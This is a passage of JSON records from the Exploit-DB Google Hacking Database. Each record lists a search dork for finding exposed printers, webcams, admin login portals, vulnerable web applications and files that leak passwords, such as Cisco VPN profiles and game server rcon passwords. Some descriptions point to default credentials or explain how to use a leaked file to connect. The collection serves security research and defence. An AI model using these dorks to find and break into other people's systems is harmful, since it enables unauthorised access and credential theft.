"Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22Lexmark+*%22+inurl%3Aport_0&filter=0", "shortDescription": "intitle:\"Lexmark *\" inurl:port_0", "textualDescription": "Lexmark printers (4 models)" }, { "signatureReferenceNumber": "928", "link": "https://www.exploit-db.com/ghdb/928/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&q=inurl%3A%2Fen%2Fhelp.cgi+%22ID%3D*%22", "shortDescription": "inurl:/en/help.cgi \"ID=*\"", "textualDescription": "Aficio printers (this search locates the help pages)" }, { "signatureReferenceNumber": "929", "link": "https://www.exploit-db.com/ghdb/929/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3Ajdewshlp+%22Welcome+to+the+Embedded+Web+Server%21%22", "shortDescription": "intitle:jdewshlp \"Welcome to the Embedded Web Server!\"", "textualDescription": "HP Officejet help page. Remove \"help.html\" for main page." }, { "signatureReferenceNumber": "930", "link": "https://www.exploit-db.com/ghdb/930/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=%22display+printer+status%22+intitle:%22Home%22&filter=0", "shortDescription": "\"display printer status\" intitle:\"Home\"", "textualDescription": "Xerox Phaser printers." }, { "signatureReferenceNumber": "931", "link": "https://www.exploit-db.com/ghdb/931/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=inurl%3AJPGLogin.htm", "shortDescription": "inurl:JPGLogin.htm", "textualDescription": "webserver detection for GeoHttpServer, the page is the login page or guest cam. Don't ask why these are mostly doggy cams, weirdness." }, { "signatureReferenceNumber": "932", "link": "https://www.exploit-db.com/ghdb/932/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?hl=en&q=intitle%3A%22Welcome+to+Windows+Small+Business+Server+2003%22&num=100", "shortDescription": "intitle:\"Welcome to Windows Small Business Server 2003\"", "textualDescription": "Another way to find Small Business Server 2003, for more results check the dork by JimmyNeutron (id=763)." }, { "signatureReferenceNumber": "933", "link": "https://www.exploit-db.com/ghdb/933/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22OfficeConnect+Cable%2FDSL+Gateway%22+intext%3A%22Checking+your+browser%22", "shortDescription": "intitle:\"OfficeConnect Cable/DSL Gateway\" intext:\"Checking your browser\"", "textualDescription": "This query allows you to find OfficeConnect Cable/DSL Gateways, by locating the browser-check page that Google has indexed. The browser-check page leads to a login page, which kindly informs you of the default password." }, { "signatureReferenceNumber": "934", "link": "https://www.exploit-db.com/ghdb/934/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intext%3A%22Powered+by+phpBB+2.0.13%22+inurl%3A%22cal_view_month.php%22%7Cinurl%3A%22downloads.php%22", "shortDescription": "intext:\"Powered by phpBB 2.0.13\" inurl:\"cal_view_month.php\"|inurl:\"downloads.php\"", "textualDescription": "phpBB 2.0.13 with installed Calendar Pro MOD are vulnerable to SQL injection attacks. An attacker can download the MD5 hashes from the account databse without authorization." }, { "signatureReferenceNumber": "935", "link": "https://www.exploit-db.com/ghdb/935/", "category": "Error Messages", "querystring": "http://www.google.co.uk/search?hl=en&q=intitle%3A%22404+SC_NOT_FOUND%22&btnG=Google+Search&meta=", "shortDescription": "Netscape Application Server Error page", "textualDescription": "This error message highlights potentially unpatched or misconfigured Netscape Application Server or iPlanet application servers. An inquisitive mind would probably want to manually alter the URL's returned by this query, just to see what other, more informative messages might be revealed. As these servers are already exhibiting a misconfiguration, this could lead to other vulnerabilities being discovered.Finally, these servers are running software that is a few years old now. An attacker may feel that because of this, there's a strong possibility that they're not patched-up fully either, making them potentially vulnerable to known exploits." }, { "signatureReferenceNumber": "936", "link": "https://www.exploit-db.com/ghdb/936/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=%22%5BSQL+Server+Driver%5D%5BSQL+Server%5DLine+1:+Incorrect+syntax+near%22+-forum+-thread+-showthread&hl=en&lr=&c2coff=1&safe=off&client=firefox-a&rls=org.mozilla:en-US:", "shortDescription": ""SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"", "textualDescription": "you can find many servers infected with sql injection" }, { "signatureReferenceNumber": "937", "link": "https://www.exploit-db.com/ghdb/937/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intext%3A%22vbulletin%22+inurl%3Aadmincp&btnG=Search&hl=en&lr=", "shortDescription": "intext:"vbulletin" inurl:admincp", "textualDescription": "vBulletin Admin Control Panel" }, { "signatureReferenceNumber": "938", "link": "https://www.exploit-db.com/ghdb/938/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22inc.+vpn+3000+concentrator%22&num=30&hl=en&lr=&safe=off&client=firefox-a&rls=org.mozilla:en-US:official&filter=0", "shortDescription": "intitle:"inc. vpn 3000 concentrator"", "textualDescription": "This search will show the login page for Cisco VPN 3000 concentrators. Since the default user id and password are readily available on the Cisco website, an out-of-the-box or test device could be wide open to mischief." }, { "signatureReferenceNumber": "939", "link": "https://www.exploit-db.com/ghdb/939/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=%22About+Winamp+Web+Interface%22+intitle%3A%22Winamp+Web+Interface%22&btnG=Search", "shortDescription": "Winamp Web Interface", "textualDescription": "Just a bit of fun, should reveal a few instances of a Winamp HTTP control program. Without login, you can't do much except see the currently playing track. With login you can have a bit more fun by changing the volume, currently playing track, viewing playlists, etc. With admin access you can delete tracks... I'll leave it to others to find out if anything cool can be done with this.Just a note, you *can't* hear the music the person is playing, it's not a stream interface, just a control interface." }, { "signatureReferenceNumber": "940", "link": "https://www.exploit-db.com/ghdb/940/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3Ailohamail+intext%3A%22Version+0.8.10%22+%22Powered+by+IlohaMail%22&btnG=Search", "shortDescription": "intitle:ilohamail intext:\"Version 0.8.10\" \"Powered by IlohaMail\"", "textualDescription": "some version of ilohamail are vulnerable." }, { "signatureReferenceNumber": "941", "link": "https://www.exploit-db.com/ghdb/941/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3Ailohamail+%22Powered+by+IlohaMail%22&btnG=Search", "shortDescription": "intitle:ilohamail \"Powered by IlohaMail\"", "textualDescription": "IlohaMail is a light-weight yet feature rich multilingual webmail system designed for ease of use, written in pure PHP. It supports web-access to IMAP and POP3 accounts, and includes a complete contacts feature and other PIM features." }, { "signatureReferenceNumber": "942", "link": "https://www.exploit-db.com/ghdb/942/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3ANeroNET+-+burning+online", "shortDescription": "intitle:\"NeroNET - burning online\"", "textualDescription": "NeroNet is an online burning device by Nero. Basically with this query you'll get a listing of active servers running the software. You can only do things like view active jobs users and the see what disc the server is burning on. However if you manage to log in as the Administrator you can have a bit more fun like change the server and recording settings. Well they were smart enough to convienently place the default password located within the softwares manual." }, { "signatureReferenceNumber": "943", "link": "https://www.exploit-db.com/ghdb/943/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=%22Parse+error:+parse+error,+unexpected+T_VARIABLE%22+%22on+line%22+filetype:php", "shortDescription": "\"Parse error: parse error, unexpected T_VARIABLE\" \"on line\" filetype:php", "textualDescription": "PHP error with a full web root path disclosure" }, { "signatureReferenceNumber": "944", "link": "https://www.exploit-db.com/ghdb/944/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=%22MacHTTP%22+filetype%3Alog+inurl%3Amachttp.log", "shortDescription": "\"MacHTTP\" filetype:log inurl:machttp.log", "textualDescription": "MacHTTP is an webserver for Macs running OS 6-9.x. It's pretty good for older Macs but the default install leaves the MacHTTP.log file open to access." }, { "signatureReferenceNumber": "945", "link": "https://www.exploit-db.com/ghdb/945/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext%3Aics+ics", "shortDescription": "ext:ics ics", "textualDescription": "ICalender Fileder that can contain a lot of useful information about a possible target." }, { "signatureReferenceNumber": "946", "link": "https://www.exploit-db.com/ghdb/946/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=intitle:%22Default%20PLESK%20Page%22&filter=0", "shortDescription": "intitle:\"Default PLESK Page\"", "textualDescription": "Plesk Server Administrator (PSA) is web based software that enables remote administration of web servers. It can be used on Linux and other systems that support PHP.The default page is an indication that no configuration has been done (yet) for the domain" }, { "signatureReferenceNumber": "947", "link": "https://www.exploit-db.com/ghdb/947/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext%3Aplist+filetype%3Aplist+inurl%3Abookmarks.plist", "shortDescription": "ext:plist filetype:plist inurl:bookmarks.plist", "textualDescription": "These Safari bookmarks that might show very interesting info about a user's surfing habits" }, { "signatureReferenceNumber": "948", "link": "https://www.exploit-db.com/ghdb/948/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3A%22Zope+Help+System%22+inurl%3AHelpSys", "shortDescription": "intitle:\"Zope Help System\" inurl:HelpSys", "textualDescription": "By itself, this returns Zope's help pages. Manipulation of the URL, changing 'HelpSys' to 'manage', gives a link to a server's Zope Management Interface. While this requires authentication, sometimes overly revealing error messages are returned." }, { "signatureReferenceNumber": "949", "link": "https://www.exploit-db.com/ghdb/949/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext%3Ajbf+jbf", "shortDescription": "ext:jbf jbf", "textualDescription": "There is a full path disclosure in .jbf files (paint shop pro), which by itself is not a vulnerability, but it becomes interesting when uploaded or used on webservers. Use a tool like 'strings' to read the ascii parts, the path is on the top of the file." }, { "signatureReferenceNumber": "950", "link": "https://www.exploit-db.com/ghdb/950/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=%22Please+use+Netscape+2.0+or+enhance+!!%22+-site:dlink.com+-site:ovislink.com.tw&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "\"Please use Netscape 2.0 or enhance !!\" -site:dlink.com -site:ovislink.com.tw", "textualDescription": "A search for some HTML code used in a variety of D-link network devices (webcams and such)." }, { "signatureReferenceNumber": "951", "link": "https://www.exploit-db.com/ghdb/951/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:%22SFXAdmin+-+sfx_global%22+%7C+intitle:%22SFXAdmin+-+sfx_local%22+%7C+intitle:%22SFXAdmin+-+sfx_test%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"SFXAdmin - sfx_global\" | intitle:\"SFXAdmin - sfx_local\" | intitle:\"SFXAdmin - sfx_test\"", "textualDescription": "Just another logon page search, this one is for SFX\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae, a link server from Ex Libris, delivers linking services in the scholarly information environment. SFX is also a component in the management of electronic resources in a library." }, { "signatureReferenceNumber": "952", "link": "https://www.exploit-db.com/ghdb/952/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intitle:%22Welcome%20to%20the%20Advanced%20Extranet%20Server,%20ADVX!%22", "shortDescription": "intitle:\"Welcome to the Advanced Extranet Server, ADVX!\"", "textualDescription": "Webserver detection: The Advanced Extranet Server project aims to create an extensible open source web server based on Apache." }, { "signatureReferenceNumber": "953", "link": "https://www.exploit-db.com/ghdb/953/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=inurl:cgi-bin+inurl:bigate.cgi&num=100&hl=en&lr=&c2coff=1&safe=off&filter=1", "shortDescription": "inurl:cgi-bin inurl:bigate.cgi", "textualDescription": "Anonymous surfing with bigate.cgi. Remove http:// when you copy paste or it won't work." }, { "signatureReferenceNumber": "954", "link": "https://www.exploit-db.com/ghdb/954/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&newwindow=1&q=ext%3Adhtml+intitle%3A%22document+centre%7C%28home%29%22+OR+intitle%3A%22xerox%22", "shortDescription": "ext:dhtml intitle:"document centre|(home)" OR intitle:"xerox"", "textualDescription": "Various Online Devices>Xerox (*Centre)" }, { "signatureReferenceNumber": "955", "link": "https://www.exploit-db.com/ghdb/955/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext%3ADBF+DBF&hl=en&lr=", "shortDescription": "ext:DBF DBF", "textualDescription": "Dbase DAtabase file. Can contain sensitive data like any other database." }, { "signatureReferenceNumber": "956", "link": "https://www.exploit-db.com/ghdb/956/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext:CDX+CDX&hl=en&lr=&start=0&sa=N", "shortDescription": "ext:CDX CDX", "textualDescription": "Visual FoxPro database index" }, { "signatureReferenceNumber": "957", "link": "https://www.exploit-db.com/ghdb/957/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext:ccm+ccm+-catacomb", "shortDescription": "ext:ccm ccm -catacomb", "textualDescription": "Lotus cc:Mail Mailbox file" }, { "signatureReferenceNumber": "958", "link": "https://www.exploit-db.com/ghdb/958/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=ext:DCA+DCA&hl=en&lr=&start=0&sa=N", "shortDescription": "ext:DCA DCA", "textualDescription": "IBM DisplayWrite Document Content Architecture Text File" }, { "signatureReferenceNumber": "959", "link": "https://www.exploit-db.com/ghdb/959/", "category": "Footholds", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22ERROR%3A+The+requested+URL+could+not+be+retrieved%22+%22While+trying+to+retrieve+the+URL%22+%22The+following+error+was+encountered%22", "shortDescription": "intitle:\"ERROR: The requested URL could not be retrieved\" \"While trying to retrieve the URL\" \"The following error was encountered:\"", "textualDescription": "squid error messages, most likely from reverse proxy servers." }, { "signatureReferenceNumber": "960", "link": "https://www.exploit-db.com/ghdb/960/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=%21Host%3D*.*+intext%3Aenc_UserPassword%3D*++ext%3Apcf&btnG=Search", "shortDescription": "!Host=*.* intext:enc_UserPassword=* ext:pcf", "textualDescription": "some people actually keep their VPN profiles on the internet...omg... Simply donwload the pcf file, import it in your Cisco VPN client and try to connect" }, { "signatureReferenceNumber": "961", "link": "https://www.exploit-db.com/ghdb/961/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intitle:%22Welcome+To+Your+WebSTAR+Home+Page%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"Welcome To Your WebSTAR Home Page\"", "textualDescription": "This is the default page for the WebSTAR (Macintosh) web server (Headers say --> Server: WebSTAR NetCloak)." }, { "signatureReferenceNumber": "962", "link": "https://www.exploit-db.com/ghdb/962/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=%22Powered+by+DWMail%22+password+intitle%3Adwmail&btnG=Search", "shortDescription": "\"Powered by DWMail\" password intitle:dwmail", "textualDescription": "What is DWmail\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2?: DWmail\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 is an 'intelligent' Web based email application written in the scripting language, PHP. DWmail\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 allows you and your visitors to access, manage and send email using any POP3 or IMAP4 compliant email account. Simply enter your email address and password to check your email." }, { "signatureReferenceNumber": "963", "link": "https://www.exploit-db.com/ghdb/963/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl%3Agnatsweb.pl", "shortDescription": "inurl:gnatsweb.pl", "textualDescription": "GNU GNATS is a set of tools for tracking bugs reported by users to a central site. It allows problem report management and communication with users via various means. GNATS stores all the information about problem reports in its databases and provides tools for querying, editing, and maintenance of the databases." }, { "signatureReferenceNumber": "964", "link": "https://www.exploit-db.com/ghdb/964/", "category": "Pages containing login portals", "querystring": "http://www.google.co.uk/search?q=intitle:%22site+administration:+please+log+in%22+%22site+designed+by+emarketsouth%22&hl=en&lr=&filter=0", "shortDescription": "intitle:\"site administration: please log in\" \"site designed by emarketsouth\"", "textualDescription": "Real Estate software package, with the admin login screen" }, { "signatureReferenceNumber": "965", "link": "https://www.exploit-db.com/ghdb/965/", "category": "Footholds", "querystring": "http://www.google.com/search?q=intitle%3A%22YALA%3A+Yet+Another+LDAP+Administrator%22&btnG=Search", "shortDescription": "intitle:\"YALA: Yet Another LDAP Administrator\"", "textualDescription": "YALA is a web-based LDAP administration GUI. The idea is to simplify the directory administration with a graphical interface and neat features, though to stay a general-purpose programThe goal is to simplify the administration but not to make the YALA user stupid: to achieve this, we try to show the user what YALA does behind the scenes, what it sends to the server" }, { "signatureReferenceNumber": "966", "link": "https://www.exploit-db.com/ghdb/966/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle:open-xchange+inurl:login.pl", "shortDescription": "intitle:open-xchange inurl:login.pl", "textualDescription": "Open-Xchange 5 is a high performance substitute for costly and inflexible Microsoft Exchange deployments -- with the full functionality of a mature collaboration platform. OX 5 will not only manage appointments and tasks, it will take care of email, calendar, contacts, to do's, projects, documents, search and forums. With OX, you can manage information using bookmarks that are linked to a wide variety of data objects, such as emails, spreadsheets and/or presentations. Open-XchangeT 5 allows you to connect to Microsoft Outlook and devices using the Palm OS. Based on proven open source technologies, OX 5 offers best-of-class security through anti-virus and anti-spam utilities." }, { "signatureReferenceNumber": "967", "link": "https://www.exploit-db.com/ghdb/967/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intitle:%22Document+title+goes+here%22+intitle:%22used+by+web+search+tools%22+%22+example+of+a+simple+Home+Page%22&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "intitle:\"Document title goes here\" intitle:\"used by web search tools\" \" example of a simple Home Page\"", "textualDescription": "IBM Http Server (AS/400)" }, { "signatureReferenceNumber": "968", "link": "https://www.exploit-db.com/ghdb/968/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=intitle%3A%22WorldClient%22+intext%3A%22%C2%A9+%282003%7C2004%29+Alt-N+Technologies.%22", "shortDescription": "intitle:\"WorldClient\" intext:\"\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 (2003|2004) Alt-N Technologies.\"", "textualDescription": "MDaemon , Windows-based email server software, contains full mail server functionality and control with a strong emphasis on security to protect your email communication needs." }, { "signatureReferenceNumber": "969", "link": "https://www.exploit-db.com/ghdb/969/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle%3A%22Freifunk.Net+-+Status%22+-site%3Acommando.de", "shortDescription": "intitle:\"Freifunk.Net - Status\" -site:commando.de", "textualDescription": "Hacked WRT54G Freifunk firmware. The router is based on Linux so after the GPL the source code must be published. some guys from freifunk.net have modified it for their needs." }, { "signatureReferenceNumber": "970", "link": "https://www.exploit-db.com/ghdb/970/", "category": "Sensitive Directories", "querystring": "http://www.google.com/search?q=%0D%0Aintitle%3Aindex.of+WEB-INF", "shortDescription": "intitle:index.of WEB-INF", "textualDescription": "Finds java powered web servers which have indexing enabled on their config directory" }, { "signatureReferenceNumber": "971", "link": "https://www.exploit-db.com/ghdb/971/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=inurl%3A%22port_255%22+-htm&btnG=Google+Search", "shortDescription": "inurl:\"port_255\" -htm", "textualDescription": "Another way to dig up some not yet dorked Lexmark and a couple of Dell printers.http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=2177" }, { "signatureReferenceNumber": "972", "link": "https://www.exploit-db.com/ghdb/972/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intitle:%22SWW+link%22+%22Please+wait.....%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"SWW link\" \"Please wait.....\"", "textualDescription": "Zyxel Zywall" }, { "signatureReferenceNumber": "973", "link": "https://www.exploit-db.com/ghdb/973/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&safe=off&c2coff=1&q=intitle%3A%22InterJak+Web+Manager%22&btnG=Search", "shortDescription": "intitle:\"InterJak Web Manager\"", "textualDescription": "A router device by Uroam (formerly FilaNet), with email and VPN possibilities." }, { "signatureReferenceNumber": "974", "link": "https://www.exploit-db.com/ghdb/974/", "category": "Files containing passwords", "querystring": "http://www.google.ch/search?hl=de&q=inurl%3Aserver.cfg++rcon+password", "shortDescription": "inurl:server.cfg rcon password", "textualDescription": "Counter strike rcon passwords, saved in the server.cfg." }, { "signatureReferenceNumber": "975", "link": "https://www.exploit-db.com/ghdb/975/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle%3A%22myBloggie+2.1.1..2+-+by+myWebland%22", "shortDescription": "intitle:\"myBloggie 2.1.1..2 - by myWebland\"", "textualDescription": "myBloggie is affected by multiple vulnerabilities. http://www.securityfocus.com/bid/13507" }, { "signatureReferenceNumber": "976", "link": "https://www.exploit-db.com/ghdb/976/", "category": "Files containing passwords", "querystring": "http://www.google.co.uk/search?q=intext%3A%22powered+by+EZGuestbook%22", "shortDescription": "intext:\"powered by EZGuestbook\"", "textualDescription": "HTMLJunction EZGuestbook is prone to a database disclosure vulnerability. Remote users may download the database http://www.securityfocus.com/bid/13543/info/" }, { "signatureReferenceNumber": "977", "link": "https://www.exploit-db.com/ghdb/977/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?q=inurl%3A%3A2082%2Ffrontend+-demo", "shortDescription": "inurl::2082/frontend -demo", "textualDescription": "This allows you access to CPanel login dialogues/screens." }, { "signatureReferenceNumber": "978", "link": "https://www.exploit-db.com/ghdb/978/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?q=intitle%3A%22osTicket+%3A%3A+Support+Ticket+System%22+&btnG=Search", "shortDescription": "intitle:\"osTicket :: Support Ticket System\"", "textualDescription": "osTicket is a widely-used open source support ticket system. It is a lightweight support ticket tool written mainly using PHP scripting language. There are several vulnerabilities in the osTicket software that may allow for an attacker to take control of the affected web server, disclose sensitive data from the database, or read arbitrary files. These issues have been reported to the developers and a new updated version of osTicket is available for download. All affected users should upgrade their osTicket installations immediately.http://www.addict3d.org/index.php?page=viewarticle&type=security&ID=3882" }, { "signatureReferenceNumber": "979", "link": "https://www.exploit-db.com/ghdb/979/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=intext%3A%22Powered+by%3A+Adobe+PrintGear%22+inurl%3Aadmin+&btnG=Search", "shortDescription": "intext:\"Powered by: Adobe PrintGear\" inurl:admin", "textualDescription": "Printers equipped with Adobe's PrintGear technologyAdobe's PrintGear technology is a new printing architecture designed specifically for low-cost, high-quality output. At the core of this architecture is a custom chip, the PrintGear Imaging Processor (or PrintGear processor for short). This processor supplies the performance required for high-resolution output, yet helps keep the overall cost of the output device low." }, { "signatureReferenceNumber": "980", "link": "https://www.exploit-db.com/ghdb/980/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=%0D%0Aintitle:%22---+VIDEO+WEB+SERVER+---%22+intext:%22Video+Web+Server%22+%22Any+time+%26+Any+where%22+username+password+&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"--- VIDEO WEB SERVER ---\" intext:\"Video Web Server\" \"Any time & Any where\" username password", "textualDescription": "AVTech Video Web Server is a surveillance producted that is directly connected to the internet It could enable the AVTech DVR series products or any camera to connect to Internet for remote monitoring or remote control. Besides, it could also enable 2 video input to connect to Internet for remote monitoring and recording. Besides the web interface it also offers an ftp server." }, { "signatureReferenceNumber": "981", "link": "https://www.exploit-db.com/ghdb/981/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=DVXA,DVXA:2005-16,DVXA:en&q=inurl%3Astart%2Ehtm%3Fscrw%3D", "shortDescription": "inurl:start.htm?scrw=", "textualDescription": "VPON (Video Picture On Net) is a video surveillance setup which seems to be used by a lot of businesses. In the FAQ posted on their site (http://www.aegismicro.com/navigation/indexsuppfaq.htm) they show a default username/password of webmonitor/oyo.=)" }, { "signatureReferenceNumber": "982", "link": "https://www.exploit-db.com/ghdb/982/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=intitle:%22Welcome+to+602LAN+SUITE+*%22&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"Welcome to 602LAN SUITE *\"", "textualDescription": "The 602LAN SUITE runs on a webserver called WEB602/1.04 and includes webmail." }, { "signatureReferenceNumber": "983", "link": "https://www.exploit-db.com/ghdb/983/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.co.uk/search?hl=en&safe=off&q=inurl%3Asphpblog+intext%3A%22Powered+by+Simple+PHP+Blog+0.4.0%22&btnG=Search&meta=", "shortDescription": "inurl:sphpblog intext:\"Powered by Simple PHP Blog 0.4.0\"", "textualDescription": "simple PHP Blog is vulnerable to mutiple attacks:Vulnerabilities:~~~~~~~~~~~~~~~~A. Full Path disclosuresB. XSS in search.phpC. Critical Information dislosures http://www.securityfocus.com/archive/1/395994" }, { "signatureReferenceNumber": "984", "link": "https://www.exploit-db.com/ghdb/984/", "category": "Vulnerable Files", "querystring": "http://www.google.com/search?q=intitle:%22SSHVnc+Applet%22OR+intitle:%22SSHTerm+Applet%22+-uni-klu.ac.at+-net/viewcvs.py+-iphoting.iphoting.com&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "intitle:\"SSHVnc Applet\"OR intitle:\"SSHTerm Applet\" -uni-klu.ac.at -net/viewcvs.py -iphoting.iphoting.com", "textualDescription": "sSHTerm Applet en SSHVnc Applet pages." }, { "signatureReferenceNumber": "985", "link": "https://www.exploit-db.com/ghdb/985/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=%22To+view+the+Web+interface+of+the+SpeedTouch,+JavaScript+must+be+supported+and+enabled+on+your+browser!%22+-site:webblernet.nl+-site:ihackstuff.com+-site:blogspot.com&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "shortDescription": "\"To view the Web interface of the SpeedTouch, JavaScript must be supported and enabled on your browser!\" -site:webblernet.nl -site:ihackstuff.com -sit", "textualDescription": "speedtouch 510 DSL modem devices that were once unprotected. That may have changed by now." }, { "signatureReferenceNumber": "986", "link": "https://www.exploit-db.com/ghdb/986/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?q=%28intitle%3A%22502+Proxy+Error%22%29%7C%28intitle%3A%22503+Proxy+Error%22%29+%22The+proxy+server+could+not+handle+the+request%22+-topic+-mail+-4suite+-list+-site%3Ageocrawler.com+-site%3Aelitesecurity.org&btnG=Search", "shortDescription": "(intitle:\"502 Proxy Error\")|(intitle:\"503 Proxy Error\") \"The proxy server could not handle the request\" -topic -mail -4suite -list -site:geocrawler.co", "textualDescription": "A reverse proxy is a gateway for servers, and enables one web server to provide content from another transparently. These are often implemented to improve security or performance." }, { "signatureReferenceNumber": "987", "link": "https://www.exploit-db.com/ghdb/987/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22Dell+*%22+inurl%3Aport_0&btnG=Google+Search", "shortDescription": "intitle:\"Dell *\" inurl:port_0", "textualDescription": "oA few Online Dell Printers, status, paper, toner levels, ips macs, the usual.. (Lexmark and Dell seem to share the same embedded webserver it seems, try changing the vendor name.)" }, { "signatureReferenceNumber": "988", "link": "https://www.exploit-db.com/ghdb/988/", "category": "Sensitive Online Shopping Info", "querystring": "http://www.google.com/search?hl=en&q=intext%3A%22powered+by+Hosting+Controller%22+intitle%3AHosting.Controller+&filter=0", "shortDescription": "intext:\"powered by Hosting Controller\" intitle:Hosting.Controller", "textualDescription": "Description:==============Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform. It is the only multilingual software package you need to put your Web hosting business on autopilot.The HC has its own complete billing solution which is tightly integrated within Control Panel & does all the invoicing & billing.Vuln:======A remote authenticated user can invoke 'resellerdefaults.asp' to view reseller add-on plans and then load the following type of URL to view the details of a target reseller's plans:The 'resellerresources.asp' script does not properly validate user-supplied input in the 'resourceid' parameter. A remote authenticated user can supply specially crafted parameter values to execute SQL commands on the underlying database. This can be exploited, for example, to delete a reseller add-on plan.More on Vuln/Exploit====================http://securitytracker.com/alerts/2005/May/1014071.html" }, { "signatureReferenceNumber": "989", "link": "https://www.exploit-db.com/ghdb/989/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?hl=en&ie=ISO-8859-1&q=intitle%3A%22PacketShaper+Customer+Login%22+&btnG=Google+Search", "shortDescription": "intitle:\"PacketShaper Customer Login\"", "textualDescription": "PacketShaper Login.Provides login access for PacketShaper Customers." }, { "signatureReferenceNumber": "990", "link": "https://www.exploit-db.com/ghdb/990/", "category": "Various Online Devices", "querystring": "http://www.google.com/search?q=(+intitle:%22PacketShaper+Login%22)%7C(intitle:%22PacketShaper+Customer+Login%22)&num=100&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "( intitle:\"PacketShaper Login\")|(intitle:\"PacketShaper Customer Login\")", "textualDescription": "Packeteer's PacketShaper is an application traffic management system that monitors, controls, and accelerates application performance over the WAN Internet." }, { "signatureReferenceNumber": "991", "link": "https://www.exploit-db.com/ghdb/991/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&lr=&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=inurl%3ACitrix%2FMetaFrame%2Fdefault%2Fdefault.aspx&btnG=Search", "shortDescription": "inurl:Citrix/MetaFrame/default/default.aspx", "textualDescription": "MetaFrame Presentation Server" }, { "signatureReferenceNumber": "992", "link": "https://www.exploit-db.com/ghdb/992/", "category": "Pages containing login portals", "querystring": "http://www.google.com/search?hl=en&q=inurl%3Aexchweb%2Fbin%2Fauth%2Fowalogon.asp&btnG=Google+Search", "shortDescription": 